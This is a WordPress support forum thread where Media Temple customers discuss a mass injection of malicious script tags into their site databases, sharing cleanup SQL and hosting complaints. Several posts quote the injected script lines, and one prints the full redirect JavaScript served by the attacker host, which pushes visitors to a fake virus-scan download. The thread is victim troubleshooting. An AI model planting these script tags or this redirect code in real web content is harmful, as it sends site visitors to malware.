Hi,
I looked in one of my pages today and now all of a sudden all my pages and posts have <script src="http://ue.oeaou.com/31"></script> when you view the page in the HTML.
Was my site hacked or was this put in here by a plugin?
Media Temple oeaou hack (72 posts)
-
greenhoe
Posted 1 year ago # -
rutlo
Posted 1 year ago #I got the same thing. What plugins do you use? Maybe we have some of the same ones.
-
Ankantoiel
Posted 1 year ago #I have the same problem on several sites. I have checked the plugins I use, but they are different on the installations.
-
mediosia
Posted 1 year ago #Well, I had the same problem. MediaTemple is my hosting provider, and they help me out with this. This is a WordPress Redirect Exploit hack that put a line of code on your database table wp_posts and wp_cats_posts
The line that is put by the hack in your wp_posts and wp_cats_posts can be one of these or similar
<script src="http://ae.awaue.com/7"></script>
<script src="http://ue.oeaou.com/31"></script>
<script src="http://ie.eracou.com/3"></script>
<script src="http://ao.euuaw.com/9"></script>You must delete all of these lines
Symptoms
* Visitors viewing posts on your blog may be redirected to third-party sites.
* Visitors may also be redirected to qooglesearch.com, which has already been disabled.Clean-Up
Search in your database (specially in "wp_posts" and "wp_cats_posts" tables for strings like these and delete it.
Info take it from: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit
I don't know if maybe some plugin is doing these. I have the following plugins, let me know if you have the same or wich one do you have:
Adminimize
Akismet
cforms
Cleanup WordPress
Google Analyticator
Google News Sitemap
Google XML Sitemaps
HeadSpace2
Insights
jQuery Lightbox For Native Galleries
MobilePress
Podcasting Plugin by TSG
Post Tabs
Really Simple CAPTCHA
Revision Control
SEO Friendly Images
WordPress.com Stats
WP-PageNavi
WP-UserOnline
WP Geo
ZD YouTube FLV Player -
Posted 1 year ago #Ah thanks for the reply. My sites are also hosted on a mediatemple server. So I will try now their solution.
-
jjwright85
Posted 1 year ago #I've noticed the same problem on a few Media Template WordPress websites this morning. The fix above from Media Templates site ended up fixing it.
-
thekmen
Posted 1 year ago #Same problem here today on MediaTemplae.
The <script src= is also inserted into media attachment descriptions, so make sure to clean those too. -
locality
Posted 1 year ago #Is it strange that everyone that is having a problem is using MediaTemple? I just noticed the same thing today.
Here are the plugins I am using:
Akismet
All in One Favicon
Announcement and Vertical Scroll News
BM Custom Login
Constant Contact API
Kimili Flash Embed
Store LocatorIt looks like only Akismet is in common with you, Mediosia. I am trying to fix it on my database, but phpMyAdmin will not let me login. MediaTemple is working on it, but at this point, I'm thinking about switching hosting. I have lots of other WordPress sites and never had this problem with different hosts.
-
qbradley
Posted 1 year ago #Count me in. Found it on mine too.
And I'm on media temple.<script src="http://ue.oeaou.com/31"></script>
This redirects people to a "Virus Scan" and asks them to download the "fix"
-
Posted 1 year ago #WOW!
Now I just have a big fat "Error establishing a database connection" on my home page. -
Posted 1 year ago #I went through the cleanup process as mentioned by mediosia
I'm good to go for now -
Seems to be a media temple issue, will sticky this for now.
http://codex.wordpress.org/FAQ_My_site_was_hacked has some info on what to do in the event of hacks, as well as referencing the above posts.
-
Posted 1 year ago #fixed here too by removing all mentions via sql, but what a nightmare, esp is you have a few databases & multiple installs.
-
iso50
Posted 1 year ago #On Mediatemple too. Called and they cleaned the DBs. As for plugs, the only ones I have in common with Mediosia are as follows:
Akismet
WP-Stats
WP-Pagenavi -
Posted 1 year ago #@iso50 damn, they didn't clean my DBs, just sent me links on how to do it my self & more or less said it's not their problem.
-
sandnsurf
Posted 1 year ago #Same again
Also on WordPress hosted by MediaTemple
The only ones I have in common isAkismet
WP-StatsHopefully be able to clean up the database as per mediatemple suggestion...not the first time the MediaTemple blog has fallen over, whilst all the other hosting servers remain solid!
-
EthanCaine
Posted 1 year ago #Akismet is the only common plugin between all of us and since it comes DEFAULT with wordpress I'm not sure we should be blaming it.
Even my obscure blogs that have no traffic going to them with only a default wordpress install got hacked.
The IP addresses are pointing to LATVIA...those damn Latvians.
Anyone have any idea how those Latvians gained access to our MediaTemple accounts?
-
virtualimpax
Posted 1 year ago #I'm with Ethan - it looks like the common denominator here is the host - not a plugin.
I have a WP blog hosted with MT - ran the SQL query and I'm clean - for now! (Thanks for the link MrMist!)
I had to double check to make certain this thread wasn't dated BEFORE the big "database clean up" project from last April - when they went in and changed the USER ID and Passwords to improve security.
The $64,000 question is - is my blog "clean" because they updated my DB info or is it just because the hackers haven't found my blog yet?
-
entilza72
Posted 1 year ago #I agree, I think it is the host. I too run WP on mt and I had the same hack.
I cleaned the site as per the instructions.
A few hours later I checked my site again, and it had the same redirect. I checked the db again and lo - it was hacked again (either that, or the first round cleaning was not successful despite me checking). Cleaned again.
This begs the question. How is this happening? No information is available.
We are not seeing it on other hosts, so I am guessing this is an exploit due to Media Temple's setup. I am guessing the exposure is occuring on the database, not via the WP application.
Cheers,
Entilza -
rgbk
Posted 1 year ago #this is NUTS
how can either WP or MT be having this?
Can someone help me understand why it would be MT and not WP, or visa versa?I pay a lot to MT and it seems they have had these hacking issues more then once.
I'm on MT too, their grid service. -
Posted 1 year ago #Any of you using vimeo on your site?
I'm using vimeo as flash and as jquery built video (needed to control volume on some of the autoplaying videos)I dont use askimet, deleted it, and dont share the same plugins listed in this forum.
-
Posted 1 year ago #that url http://ue.oeaou.com/31 takes me to this script:
function toloveyes(alwayslovers,value,tobelove){ var exdate=new Date(); exdate.setDate(exdate.getDate()+tobelove); document.cookie=alwayslovers+ "=" +escape(value)+ ((tobelove==null) ? "" : ";expires="+exdate.toGMTString()); } function getCookie(alwayslovers){ if (document.cookie.length>0) { cstatr=document.cookie.indexOf(alwayslovers + "="); if (cstatr!=-1) { cstatr=cstatr + alwayslovers.length+1; olalala=document.cookie.indexOf(";",cstatr); if (olalala==-1) olalala=document.cookie.length; return unescape(document.cookie.substring(cstatr,olalala)); } } return ""; } var name=getCookie("pma_visited_theme2"); if (name==""){ toloveyes("pma_visited_theme2","1",20); var url="http://e.auoo.info/in2.php?n=508102"; window.top.location.replace(url); }else{ } -
Posted 1 year ago #If you google that pma_visited_theme2 you get this:
http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=pma_visited_theme2
-
Posted 1 year ago #rgbk, it's simple:
If it was a plug-in, or wordpress, or any other common object, then we would be seeing this on other hosts too.
No one is reporting this issue on any other host.
Only Media Temple GS (Grid Service) customers are complaining. I think that pretty clearly points the finger at a vulnerability directly related to that host. Try googling for more info (as I did) and you will find very little info, except pointing to media temple's site, blogs/tweets from media temple users, and this thread.
I suspect customer databases are being manipulated without using wordpress (ie: the exploit is not occuring via wordpress), although I do note with great suspicion that all my wp php files were altered on 31 July. Possibly that was the WP 3.0.1 update though.
Cheers,
Entilza -
traversal
Posted 1 year ago #I have this issue on every single site I look after on MediaTemple GS too. Bummer. Did anyone else notice that their WordPress sites slowed to a CRAWL for a few hours mid-way through last week? My guess is that this is when the attack took place.
-
khawkins98
Posted 1 year ago #Happened to a few folks that run sites on my GS w/ version 2.9 and 3.0.
And the 3.0 uses only the Akismet, Pagebar2, Viper's Video Quicktags, and WP-Walla plugins.
This SQL query helped clean nicely
UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ao.euuaw.com/9"></script>', ' ')@entilza72 The hack didn't affect the timestamps of wp-*.php files.
-
Posted 1 year ago #Are you guys getting a response from MT?
I find it shocking that i sent them a support query yesterday and 24 hours still nothing?
They aren't cheap either. I mean why arent they jumping on this issue? I sent them this forum discussion and everything.Btw i didn't update to 3.01.
-
Hi,
There have been many similar problems on MediaTemple lately. Can you check permissions of wp-config.php and report them here?
This file contains mySql passwords in clear text and should not be world-readable. Otherwise, anyone from neighbor accounts can gain access to you WordPress database and modify it however they want to.
-
brent3721
Posted 1 year ago #also using mediatemple grid server, we are in spain at the moment, maybe people can report their geographic location, I doubt that matters, but you never know.
-
Posted 1 year ago #@UseShots - mine was world read. Not good practice, but I believe these servers are jailed and it is not possible for a user to cd into your file structure, or read a file if they know where it is. I have changed to my local user rw (rw---- or 500) just in case.
@rgbk - it occured with my 3.0.1 site. I logged a job over 24 hrs ago. The official line over a day ago was this was a WordPress exploit, not an mt problem. Clearly, that is incorrect.
@khawkins98 - yeah, I figure I updated to 3.0.1 on that date.
@traversal - my mt wp site has been crawling since day one. Often can take up to 10 seconds to begin serving. Strangely, non-wp content can begin serving in around 2 seconds.
Topic Closed
This topic has been closed to new replies.
